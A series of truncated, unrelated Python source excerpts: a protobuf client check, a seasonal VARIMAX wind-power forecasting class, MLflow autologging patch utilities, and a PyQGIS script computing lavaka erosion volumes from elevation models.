coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([name]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then
# -*- coding: utf-8 -*- """ Created on Fri Nov 19 11:23:03 2021 Authors: <NAME>, <NAME>, and <NAME> E-Mails: {aand17, mvejli17, <EMAIL> In this module the main functionality supporting the use of seasonal autoregressive integrated moving average models as described in the report Forecasting Wind Power Production - Chapter 2: Time Series Analysis This model class can be used to estimate parameters of s-ARIMAX and s-VARIMAX models using the scripts - sARIMAX_validation - sARIMAX_test - sVARIMAX_validation - sVARIMAX_test The module has been developed using Python 3.9 with the libraries numpy and scipy. """ import numpy as np from time import time class sVARMAX(object): """ Main class for estimation and forecasting of s-VARIMAX(p, d, q) X (p_s, d_s, q_s)_s models using OLS for quick and dirty fit of parameters. Details regarding the models can be found in the report Forecasting Wind Power Production - Chapter 2: Time Series Analysis - Chapter 6: Experimental Setup - Section 6.2.2: s-ARIMAX - Section 6.2.4: s-VARIMAX """ def __init__(self, y, z_reg, z_NWP, missing_t, p=1, d=0, q=0, p_s=0, q_s=0, s=288, m=0, m_s=0, l="all", use_NWP=True, use_reg=True): """ Parameters ---------- y : ndarray, size=(n, k) Power data. z_reg : ndarray, size=(n, 2) Regulation data. z_NWP : ndarray, size=(55, n_nwp, 11*k) Numerical weather prediction data. missing_t : ndarray Array of time indices where a discontinuity in time is present due to missing power history data. The first entry in the array is zero and the last entry in the list is n. p : int, optional Autoregressive order. The default is 1. d : int Order of differencing. Options are 0 and 1. The default is 0. q : int Moving average order. The default is 0. p_s : int, optional Seasonal autoregressive order. The default is 0. q_s : int, optional Seasonal moving average order. The default is 0. s : int, optional Seasonal delay. The default is 288. m : int, optional Order of autoregressive model used for the initial parameter estimate. The default is 0. m_s : int, optional Seasonal order for the autoregressive model used for the initial parameter estimate. The default is 0. l : int, optional Sub-grid. Options are l = 0, \dots, 20. This input should be given in the case of a univariate time series model. The default is "all". use_NWP : bool, optional Boolean variable to decide if numerical weather predictions (NWPs) should be used as exogenous variables. The default is True. use_reg : bool, optional Boolean variable to decide if down-regulation should be used as an exogenous variable. The default is True. """ # Initialize variables self.use_reg = use_reg self.use_NWP = use_NWP self.p = p self.d = d self.q = q self.p_s = p_s self.q_s = q_s self.s = s self.l = l self.m = m self.m_s = m_s if p_s == 0: assert m_s == 0 assert d == 0 or d == 1 # Store data self.y, self.missing_t = self.do_differencing(y.astype(dtype=np.float32), missing_t) self.nr_missing_t = len(self.missing_t)-1 if self.use_reg: self.z_reg = z_reg.astype(dtype=np.float32) else: self.z_reg = None if self.use_NWP: self.z_NWP = z_NWP.astype(dtype=np.float32) else: self.z_NWP = None # Initialize more variables self.n, self.k = np.shape(self.y) if self.use_NWP is True and self.use_reg is True: self.r_part = 13 elif self.use_NWP is True and self.use_reg is False: self.r_part = 12 elif self.use_NWP is False and self.use_reg is True: self.r_part = 2 elif self.use_NWP is False and self.use_reg is False: self.r_part = 1 else: raise AssertionError("Invalid input(s) supplied to use_NWP and/or use_reg") self.r = self.k*self.r_part self.max_delay_AR = p_s*s + p # The maximum delay in the autoregressive part self.max_delay_MA = q_s*s + q # The maximum delay in the moving average part self.max_delay = max(self.max_delay_AR, self.max_delay_MA) # The maximum delay self.p_tot = p+(p+1)*p_s # Total number of autoregressive delays self.q_tot = q+(q+1)*q_s # Total number of moving average delays # Choose exogenous variable method if self.use_NWP is False: self.make_z = self.make_EMD_z elif self.use_NWP is True and self.use_reg is True: self.make_z = self.make_NWP_z else: raise AssertionError("This case is not supported.") def do_differencing(self, y, missing_t): """ Differencing for the power data. Note that differencing for the exogenous variables are done in make_NWP_z(). Parameters ---------- y : ndarray, size=(n, 21) Wind power data. missing_t : array Array of time indices where a discontinuity in time is present due to missing power history data. The first entry in the array is zero and the last entry is n. Returns ------- y : ndarray, size(n, k) Differenced wind power data. missing_t : array Array of time indices where a discontinuity in time is present due to missing power history data for the differenced data. The first entry in the array is zero and the last entry is n. """ if self.d == 0: return y, missing_t # if self.l != "all": # power = np.expand_dims(y[:, self.l], -1) # y = power elif self.d == 1: # if self.l != "all": # power = np.expand_dims(y[:, self.l], -1) # elif self.l == "all": # power = y y = y[1:, :] - y[:-1, :] missing_t[1:] = missing_t[1:]-1 return y, missing_t def update_parameters(self, Theta): """ Updates the parameters using the dictionary Theta. Save to self ------- Psi, Psi, Xi, Sigma_u """ self.Phi = Theta["Phi"] if self.q != 0 or self.q_s != 0: self.Psi = Theta["Psi"] else: self.Psi = [] self.Xi = Theta["Xi"] self.Sigma_u = Theta["Sigma_u"] def return_parameters(self): return self.Phi, self.Psi, self.Xi, self.Sigma_u def fit(self): """ Conduct parameter estimation using OLS (quick and dirty). """ self.z = np.zeros((self.n, self.r)) for t in range(self.n): self.z[t, :] = self.make_z(0, t, self.z_reg, self.z_NWP).astype(dtype=np.float32) if self.q == 0: Xi, Phi, Sigma_u, _ = self.sVARX_fit(self.p, self.p_s, self.s) Theta = {"Phi": Phi, "Psi": None, "Xi": Xi, "Sigma_u": Sigma_u} else: # Do initial parameter estimation Xi, Phi, Psi, Sigma_u = self.sVARMAX_fit(self.m, self.m_s) Theta = {"Phi": Phi, "Psi": Psi, "Xi": Xi, "Sigma_u": Sigma_u} self.update_parameters(Theta) def sVARX_fit(self, p, p_s, s): """ Fit a s-VARX(p) x (p_s)_s using OLS. Parameters ---------- p : int Autoregressive order. p_s : int Seasonal autoregressive order. s : int Seasonal delay. Returns ------- Xi : ndarray, size=(k, r) Exogenous variable parameter matrix. Phi : list, len=(p+(p+1)*p_s) List of autoregressive parameter matrices given as ndarrays of size=(k, k). Sigma_u : ndarray, size=(k, k) Covariance of white noise process. u_hat : ndarray, size=(n, k) Estimate of white noise process. """ if self.p_s == 0 and self.q_s == 0: if self.d == 0 and self.l == "all": print(f"Fit a VARX({p}) model.") elif self.d == 1 and self.l == "all": print(f"Fit a VARIMAX({p}, {self.d}, {0}) model.") elif self.d == 0 and self.l != "all": print(f"Fit a ARX({p}) model.") elif self.d == 1 and self.l != "all": print(f"Fit a ARIMAX({p}, {self.d}, {0}) model.") else: raise AssertionError("Invalid differencing input. Options are d={0, 1}.") else: if self.d == 0 and self.l == "all": print(f"Fit a s-VARX({p}) x ({p_s})_{s} model.") elif self.d == 1 and self.l == "all": print(f"Fit a s-VARIMAX({p}, {self.d}, {0}) x ({p_s}, {0}, {0})_{s} model.") elif self.d == 0 and self.l != "all": print(f"Fit a s-ARX({p}) x ({p_s})_{s} model.") elif self.d == 1 and self.l != "all": print(f"Fit a s-ARIMAX({p}, {self.d}, {0}) x ({p_s}, {0}, {0})_{s} model.") else: raise AssertionError("Invalid differencing input. Options are d={0, 1}.") delay_list_AR = [j_s*s+j for j_s in range(p_s+1) for j in range(p+1)][1:] max_delay_AR = p_s*s + p p_tot = p+(p+1)*p_s u_hat_temp = np.zeros((self.n-2*288-(max_delay_AR*self.nr_missing_t), self.k), dtype=np.float32) pars = np.zeros((p_tot*self.k+self.r_part, self.k), dtype=np.float32) idx_list = [] if self.l == "all": iter_l = 0 else: iter_l = self.l for l in range(iter_l, iter_l+self.k): idx = 0 Y = np.zeros(self.n-2*288-(max_delay_AR*self.nr_missing_t), dtype=np.float32) X = np.zeros((self.n-2*288-(max_delay_AR*self.nr_missing_t), p_tot*self.k+self.r_part), dtype=np.float32) for missing_t_idx in range(self.nr_missing_t): idx_list.append(idx) a = self.missing_t[missing_t_idx]+max_delay_AR if missing_t_idx < self.nr_missing_t-1: b = self.missing_t[missing_t_idx+1]-288 else: b = self.missing_t[missing_t_idx+1] for t in range(a, b): X_t = np.zeros((p_tot, self.k)) for counter, delay in enumerate(delay_list_AR): X_t[counter, :] = self.y[t-delay, :] X[idx, :p_tot*self.k] = X_t.flatten() if self.k == 1: X[idx, p_tot*self.k:] = self.z[t, :] Y[idx] = self.y[t, 0] elif self.k == 21: X[idx, p_tot*self.k:] =
import abc import inspect import itertools import functools import os import uuid import warnings from abc import abstractmethod from contextlib import contextmanager import mlflow from mlflow.entities.run_status import RunStatus from mlflow.tracking.client import MlflowClient from mlflow.utils import gorilla from mlflow.utils.autologging_utils import _logger from mlflow.utils.autologging_utils.events import AutologgingEventLogger from mlflow.utils.autologging_utils.logging_and_warnings import ( set_mlflow_events_and_warnings_behavior_globally, set_non_mlflow_warnings_behavior_for_current_thread, ) from mlflow.utils.mlflow_tags import MLFLOW_AUTOLOGGING _AUTOLOGGING_TEST_MODE_ENV_VAR = "MLFLOW_AUTOLOGGING_TESTING" def try_mlflow_log(fn, *args, **kwargs): """ Catch exceptions and log a warning to avoid autolog throwing. """ try: return fn(*args, **kwargs) except Exception as e: if is_testing(): raise else: warnings.warn("Logging to MLflow failed: " + str(e), stacklevel=2) # Function attribute used for testing purposes to verify that a given function # has been wrapped with the `exception_safe_function` decorator _ATTRIBUTE_EXCEPTION_SAFE = "exception_safe" def exception_safe_function(function): """ Wraps the specified function with broad exception handling to guard against unexpected errors during autologging. """ if is_testing(): setattr(function, _ATTRIBUTE_EXCEPTION_SAFE, True) def safe_function(*args, **kwargs): try: return function(*args, **kwargs) except Exception as e: if is_testing(): raise else: _logger.warning("Encountered unexpected error during autologging: %s", e) safe_function = update_wrapper_extended(safe_function, function) return safe_function def _exception_safe_class_factory(base_class): """ Creates an exception safe metaclass that inherits from `base_class`. """ class _ExceptionSafeClass(base_class): """ Metaclass that wraps all functions defined on the specified class with broad error handling logic to guard against unexpected errors during autlogging. Rationale: Patched autologging functions commonly pass additional class instances as arguments to their underlying original training routines; for example, Keras autologging constructs a subclass of `keras.callbacks.Callback` and forwards it to `Model.fit()`. To prevent errors encountered during method execution within such classes from disrupting model training, this metaclass wraps all class functions in a broad try / catch statement. Note: `ExceptionSafeClass` does not handle exceptions in class methods or static methods, as these are not always Python callables and are difficult to wrap """ def __new__(cls, name, bases, dct): for m in dct: # class methods or static methods are not callable. if callable(dct[m]): dct[m] = exception_safe_function(dct[m]) return base_class.__new__(cls, name, bases, dct) return _ExceptionSafeClass ExceptionSafeClass = _exception_safe_class_factory(type) # `ExceptionSafeClass` causes an error when used with an abstract class. # # ``` # class AbstractClass(abc.ABC): # ... # # class DerivedClass(AbstractClass, metaclass=ExceptionSafeClass): # ... # ``` # # This raises: # # ``` # TypeError: metaclass conflict: the metaclass of a derived class must be # a (non-strict) subclass of the metaclasses of all its bases. # ``` # # To avoid this error, create `ExceptionSafeAbstractClass` that is based on `abc.ABCMeta`. ExceptionSafeAbstractClass = _exception_safe_class_factory(abc.ABCMeta) class PatchFunction: """ Base class representing a function patch implementation with a callback for error handling. `PatchFunction` should be subclassed and used in conjunction with `safe_patch` to safely modify the implementation of a function. Subclasses of `PatchFunction` should use `_patch_implementation` to define modified ("patched") function implementations and `_on_exception` to define cleanup logic when `_patch_implementation` terminates due to an unhandled exception. """ @abstractmethod def _patch_implementation(self, original, *args, **kwargs): """ Invokes the patch function code. :param original: The original, underlying function over which the `PatchFunction` is being applied. :param *args: The positional arguments passed to the original function. :param **kwargs: The keyword arguments passed to the original function. """ pass @abstractmethod def _on_exception(self, exception): """ Called when an unhandled standard Python exception (i.e. an exception inheriting from `Exception`) or a `KeyboardInterrupt` prematurely terminates the execution of `_patch_implementation`. :param exception: The unhandled exception thrown by `_patch_implementation`. """ pass @classmethod def call(cls, original, *args, **kwargs): return cls().__call__(original, *args, **kwargs) def __call__(self, original, *args, **kwargs): try: return self._patch_implementation(original, *args, **kwargs) except (Exception, KeyboardInterrupt) as e: try: self._on_exception(e) finally: # Regardless of what happens during the `_on_exception` callback, reraise # the original implementation exception once the callback completes raise e def with_managed_run(autologging_integration, patch_function, tags=None): """ Given a `patch_function`, returns an `augmented_patch_function` that wraps the execution of `patch_function` with an active MLflow run. The following properties apply: - An MLflow run is only created if there is no active run present when the patch function is executed - If an active run is created by the `augmented_patch_function`, it is terminated with the `FINISHED` state at the end of function execution - If an active run is created by the `augmented_patch_function`, it is terminated with the `FAILED` if an unhandled exception is thrown during function execution Note that, if nested runs or non-fluent runs are created by `patch_function`, `patch_function` is responsible for terminating them by the time it terminates (or in the event of an exception). :param autologging_integration: The autologging integration associated with the `patch_function`. :param patch_function: A `PatchFunction` class definition or a function object compatible with `safe_patch`. :param tags: A dictionary of string tags to set on each managed run created during the execution of `patch_function`. """ def create_managed_run(): managed_run = mlflow.start_run() if tags: try_mlflow_log(mlflow.set_tags, tags) _logger.info( "Created MLflow autologging run with ID '%s', which will track hyperparameters," " performance metrics, model artifacts, and lineage information for the" " current %s workflow", managed_run.info.run_id, autologging_integration, ) return managed_run if inspect.isclass(patch_function): class PatchWithManagedRun(patch_function): def __init__(self): super(PatchWithManagedRun, self).__init__() self.managed_run = None def _patch_implementation(self, original, *args, **kwargs): if not mlflow.active_run(): self.managed_run = try_mlflow_log(create_managed_run) result = super(PatchWithManagedRun, self)._patch_implementation( original, *args, **kwargs ) if self.managed_run: try_mlflow_log(mlflow.end_run, RunStatus.to_string(RunStatus.FINISHED)) return result def _on_exception(self, e): if self.managed_run: try_mlflow_log(mlflow.end_run, RunStatus.to_string(RunStatus.FAILED)) super(PatchWithManagedRun, self)._on_exception(e) return PatchWithManagedRun else: def patch_with_managed_run(original, *args, **kwargs): managed_run = None if not mlflow.active_run(): managed_run = try_mlflow_log(create_managed_run) try: result = patch_function(original, *args, **kwargs) except (Exception, KeyboardInterrupt): # In addition to standard Python exceptions, handle keyboard interrupts to ensure # that runs are terminated if a user prematurely interrupts training execution # (e.g. via sigint / ctrl-c) if managed_run: try_mlflow_log(mlflow.end_run, RunStatus.to_string(RunStatus.FAILED)) raise else: if managed_run: try_mlflow_log(mlflow.end_run, RunStatus.to_string(RunStatus.FINISHED)) return result return patch_with_managed_run def is_testing(): """ Indicates whether or not autologging functionality is running in test mode (as determined by the `MLFLOW_AUTOLOGGING_TESTING` environment variable). Test mode performs additional validation during autologging, including: - Checks for the exception safety of arguments passed to model training functions (i.e. all additional arguments should be "exception safe" functions or classes) - Disables exception handling for patched function logic, ensuring that patch code executes without errors during testing """ return os.environ.get(_AUTOLOGGING_TEST_MODE_ENV_VAR, "false") == "true" def safe_patch( autologging_integration, destination, function_name, patch_function, manage_run=False ): """ Patches the specified `function_name` on the specified `destination` class for autologging purposes, preceding its implementation with an error-safe copy of the specified patch `patch_function` with the following error handling behavior: - Exceptions thrown from the underlying / original function (`<destination>.<function_name>`) are propagated to the caller. - Exceptions thrown from other parts of the patched implementation (`patch_function`) are caught and logged as warnings. :param autologging_integration: The name of the autologging integration associated with the patch. :param destination: The Python class on which the patch is being defined. :param function_name: The name of the function to patch on the specified `destination` class. :param patch_function: The patched function code to apply. This is either a `PatchFunction` class definition or a function object. If it is a function object, the first argument should be reserved for an `original` method argument representing the underlying / original function. Subsequent arguments should be identical to those of the original function being patched. :param manage_run: If `True`, applies the `with_managed_run` wrapper to the specified `patch_function`, which automatically creates & terminates an MLflow active run during patch code execution if necessary. If `False`, does not apply the `with_managed_run` wrapper to the specified `patch_function`. """ from mlflow.utils.autologging_utils import get_autologging_config, autologging_is_disabled if manage_run: patch_function = with_managed_run( autologging_integration, patch_function, tags={MLFLOW_AUTOLOGGING: autologging_integration}, ) patch_is_class = inspect.isclass(patch_function) if patch_is_class: assert issubclass(patch_function, PatchFunction) else: assert callable(patch_function) def safe_patch_function(*args, **kwargs): """ A safe wrapper around the specified `patch_function` implementation designed to handle exceptions thrown during the execution of `patch_function`. This wrapper distinguishes exceptions thrown from the underlying / original function (`<destination>.<function_name>`) from exceptions thrown from other parts of `patch_function`. This distinction is made by passing an augmented version of the underlying / original function to `patch_function` that uses nonlocal state to track whether or not it has been executed and whether or not it threw an exception. Exceptions thrown from the underlying / original function are propagated to the caller, while exceptions thrown from other parts of `patch_function` are caught and logged as warnings. """ #
################################################################################# #-------------------------------------------------------------------------------# # LAVAKA VOLUME DETERMINATION #-------------------------------------------------------------------------------# ################################################################################# # This PyQGIS script is written by <NAME> in QGIS version 3.8.1 with GRASS # 7.6.1. This script is used to reconstruct the original topography around a # lavaka and to calculate the lavaka volume as the difference between the # reconstructed topography and current topography. # The input files and different steps to obtain the volumes are described below. # Folder directions and file names will have to be adapted to the user's names # last changes made: 02/8/2021 # contact: <EMAIL> ################################################################################# # STEP 0: READ IN THE SHAPEFILES ################################################################################# # as a first step the necessary folder directions are set and the three required # input files are loaded # 1) shapefile containing the digitized lavaka outlines: 'Lavaka.shp' # 2) shapefile containing a pre-erosion surface polygon for each lavaka: 'Poly_OriSurf.shp' # 3) DEM raster file: 'DEM.tif' # All files are in UTM coordinates. The ID of the pre-erosion polygons must # corrspond with the id (first part of the name) of the lavaka polygon. # Set the folder in which all files are stored and make this the working directory path = 'C:/Folder/subfolder/.../Lavaka_Volumes/example/' os.chdir(path) # Read in the files DEM = path+'SRTM.tif' poly_surf = path+'poly_OriginalSurf.shp' lavaka = path+'lavaka.shp' # load the shapefile layers lavaka_layer = QgsVectorLayer(lavaka, 'lavaka', 'ogr') poly_layer = QgsVectorLayer(poly_surf, 'poly', 'ogr') # Set the interpolation method (Spline = 1 or TIN = 2) interpol_method = 2 ################################################################################ # TOO CHECK BEFORE CONTINUING ################################################################################ # Some final checks before starting the analysis: # 1. check if the shafile layers are correctly loaded if not lavaka_layer.isValid(): print("Lavaka layer failed to load!") if not poly_layer.isValid() : print("Poly layer failed to load!") # 2. check if the x and y resolution of the DEM are EXACTLY the same. # (Properties -> Information -> Pixel Size) # If not: warp (reproject) -> define the resolution and save the DEM # 3. check if the lavaka polygon layer has a field 'id'. # If not: create id field and fill it with the id's by using the code below # Create field 'id': from PyQt5.QtCore import QVariant layer_provider=lavaka_layer.dataProvider() layer_provider.addAttributes([QgsField("id",QVariant.Double)]) lavaka_layer.updateFields() print (lavaka_layer.fields().names()) # fill the field with the id's which are extracted from the names # (the name of the lavaka start with the id) lavaka_layer.startEditing() for feature in lavaka_layer.getFeatures(): name = feature['Name'] name_split = name.split("_")[0] feature['id'] = name_split lavaka_layer.updateFeature(feature) ################################################################################ # STEP 1: CREATE POINTS IN PRE-EROSION POLYGON ################################################################################ # create a new folder called 'randomPoints' to the main folder. In this folder # the layers containing the random points will be stored # add the layer to the map without plotting italic QgsProject.instance().addMapLayer(poly_layer, False) # loop through all the features of the polygon layer to get the correct ID's # use i as an index to select each feature of the shapefile i=0 for feature in poly_layer.getFeatures(): ID=(feature['ID']) print(ID) poly_layer.select(i) #set input params params = {'INPUT':QgsProcessingFeatureSourceDefinition(poly_layer.id(), True), 'STRATEGY':0, 'EXPRESSION':' $area /20', 'MIN_DISTANCE':1, 'OUTPUT': path+'randomPoints/'+str(ID)+'_random_points.shp'} processing.run("qgis:randompointsinsidepolygons", params) #Remove the current selection and then pass to the next one poly_layer.removeSelection() i=i+1 ################################################################################ # STEP 2: ASSIGN DEM-VALUES TO POINTS ################################################################################ # create a new folder called 'randomPointsDEM' to the main folder. In this folder # the layers containing the random points with assigned DEM values will be stored # loop through all the files of folder randomPoints for file in os.listdir(path+'randomPoints'): filename = os.fsdecode(file) # run the algorithm for all the .shp layers if filename.endswith(".shp"): print(filename) params = {'SHAPES':path+'randomPoints/'+filename, 'GRIDS':[DEM], 'RESAMPLING':0, 'RESULT': path+'randomPointsDEM/'+filename[0:-4]+'_DEM.shp'} processing.run("saga:addrastervaluestopoints",params) ################################################################################ # STEP 3: INTERPOLATE THE PRE-EROSION SURFACE ################################################################################ # Two interpolation methods are used: Spline and TIN interpolation. # The method that will be applied to the data is set in the beginning of the script # (interpol_method = 1 or 2. 1 = Spline, 2 = TIN). # 1. SPLINE INTERPOLATION # Create a new folder called 'SPLINEinterpol' to the main folder. In this folder # the layers containing the interpolated surfaces will be stored # 'zcolumn': Verify the name of the height attribute of the randomPointsDEM layer that # was created in the previous step, this name has to be filled in for 'zcolumn' # 'GRASS_REGION_CELLSIZE_PARAMETER': equal to the resolution of the DEM # (TanDEM-X: 12 m, SRTM: 30 m, UAV-SfM: 0.20 m) if interpol_method == 1: # loop through all the files of folder randomPointsDEM for file in os.listdir(path+'randomPointsDEM'): filename = os.fsdecode(file) # run the algorithm for all the .shp layers if filename.endswith(".shp"): print(filename) # get the extend of the layer params = {'input':path +'randomPointsDEM/'+filename, 'zcolumn':'SRTM', 'where':'', 'mask':None, 'tension':40, 'smooth':None, 'smooth_column':None, 'segmax':40, 'npmin':300, 'dmin':None, 'dmax':None, 'zscale':1, 'theta':None, 'scalex':None, '-t':False, '-d':False, 'elevation':path+'SPLINEinterpol/'+ filename.split("_")[0]+'_spline.tif', 'aspect':'TEMPORARY_OUTPUT', 'pcurvature':'TEMPORARY_OUTPUT', 'tcurvature':'TEMPORARY_OUTPUT', 'mcurvature':'TEMPORARY_OUTPUT', 'deviations':'TEMPORARY_OUTPUT', 'treeseg':'TEMPORARY_OUTPUT', 'overwin':'TEMPORARY_OUTPUT', 'GRASS_REGION_PARAMETER':None, 'GRASS_REGION_CELLSIZE_PARAMETER':30.49, 'GRASS_RASTER_FORMAT_OPT':'', 'GRASS_RASTER_FORMAT_META':'', 'GRASS_SNAP_TOLERANCE_PARAMETER':-1, 'GRASS_MIN_AREA_PARAMETER':0.0001, 'GRASS_OUTPUT_TYPE_PARAMETER':0, 'GRASS_VECTOR_DSCO':'', 'GRASS_VECTOR_LCO':'', 'GRASS_VECTOR_EXPORT_NOCAT':False} processing.run("grass7:v.surf.rst",params) # 2. TIN interpolation # Create a new folder called 'TINinterpol' to the main folder. In this folder # the layers containing the interpolated surfaces will be stored # 'PIXEL_SIZE = set to the pixel size of the DEM # (TanDEM-X: 12 m, SRTM: 30 m, UAV-SfM: 0.20 m) if interpol_method == 2: # loop through all the files of folder randomPointsDEM for file in os.listdir(path+'randomPointsDEM'): filename = os.fsdecode(file) # run the algorithm for all the .shp layers if filename.endswith(".shp"): print(filename) # get the extend of the layer pointsDEM = QgsVectorLayer(path+'randomPointsDEM/'+filename, '', 'ogr') ext = pointsDEM.extent() xmin = ext.xMinimum() xmax = ext.xMaximum() ymin = ext.yMinimum() ymax = ext.yMaximum() params = {'INTERPOLATION_DATA':path +'randomPointsDEM/'+filename+'::~::0::~::1::~::0', 'METHOD':0, 'EXTENT':str(xmin)+','+str(xmax)+','+str(ymin)+','+str(ymax)+' [EPSG:32739]', 'PIXEL_SIZE':30.49, 'OUTPUT':path+'TINinterpol/'+ filename.split("_")[0]+'_interpol.tif'} processing.run("qgis:tininterpolation",params) ################################################################################ # STEP 4: CALCULATE ELEVATION DIFFERENCE ################################################################################ # substract the original DEM from the interpolated DEM to get the heigh difference # import the necesarry toolboxes from qgis.analysis import QgsRasterCalculator, QgsRasterCalculatorEntry # load the DEM layer DEM_layer = QgsRasterLayer(DEM,"DEM_layer") if not DEM_layer.isValid(): print("DEM_layer failed to load!") entries = [] boh2 = QgsRasterCalculatorEntry() boh2.ref = 'boh2@1' boh2.raster = DEM_layer boh2.bandNumber = 1 entries.append( boh2 ) # folder names depend on the interpolation method if interpol_method == 1: # Create a new folder called 'DEM_dif_SPLINE' to the main folder. In this folder # the layers containing the DEM difference layers based on the SPLINE method will be stored inputFolder = path + 'SPLINEinterpol' outputFolder = path + 'DEM_dif_SPLINE/' if interpol_method == 2: # Create a new folder called 'DEM_dif_TIN' to the main folder. In this folder # the layers containing the DEM difference layers based on the TIN method will be stored inputFolder = path+'TINinterpol' outputFolder = path + 'DEM_dif_TIN/' # loop through all the files of the folder in which the interpolation results # are stored for file in os.listdir(inputFolder): filename = os.fsdecode(file) # run the algorithm for all the .shp layers if filename.endswith(".tif"): print(filename) interpolLayer = QgsRasterLayer(inputFolder+'/'+filename,"interpolLayer") if not interpolLayer.isValid(): print("interpolLayer failed to load!") boh1 = QgsRasterCalculatorEntry() boh1.ref = 'boh1@1' boh1.raster = interpolLayer boh1.bandNumber = 1 entries.append( boh1 ) # Process calculation with input extent and resolution calc = QgsRasterCalculator('(boh1@1 - boh2@1)',outputFolder+'/'+filename.split("_")[0]+'_DEM_dif.tif','GTiff', interpolLayer.extent(), interpolLayer.width(), interpolLayer.height(), entries ) calc.processCalculation() #remove the latest added entry del entries [1] ################################################################################ # STEP 5: ELEVATION DIFFERENCE CLIPPED TO LAVAKA EXTENT ################################################################################ # folder names depend on the interpolation method if interpol_method == 1: # Create a new folder called 'Clipped_SPLINE' to the main folder. In this folder # the layers containing the clipped DEM difference layers based on the SPLINE method will be stored inputFolder = path + 'DEM_dif_SPLINE' outputFolder = path + 'Clipped_SPLINE/' if interpol_method == 2: # Create a new folder called 'Clipped_TIN' to the main folder. In this folder # the layers containing the clipped DEM difference layers based on the TIN method will be stored inputFolder = path + 'DEM_dif_TIN' outputFolder = path + 'Clipped_TIN/' # loop through all the files of DEM dif (= all the files for which the polygons are drawn) for file in os.listdir(inputFolder): filename = os.fsdecode(file) # run the algorithm for all the .shp layers if filename.endswith(".tif"): print(filename) ID1 = filename.split("_")[0] print(ID1) query = '"ID" = '+str(ID1) selection = lavaka_layer.getFeatures(QgsFeatureRequest().setFilterExpression(query)) lavaka_layer.selectByIds([s.id() for s in selection]) lavaka_layer.selectedFeatures() QgsProject.instance().addMapLayer(lavaka_layer, False) params = {'INPUT':inputFolder+'/'+filename, 'POLYGONS':QgsProcessingFeatureSourceDefinition(lavaka_layer.id(), True), 'OUTPUT':outputFolder+str(ID1)+'_DEMdif_clipped.sdat'} processing.run("saga:cliprasterwithpolygon",params) ################################################################################ # STEP 6: EXPORT RESULTS ################################################################################ # folder names depend on the interpolation method if interpol_method == 1: # Create a new folder called 'ClippedRasterValues_SPLINE' to the main folder. In this folder # the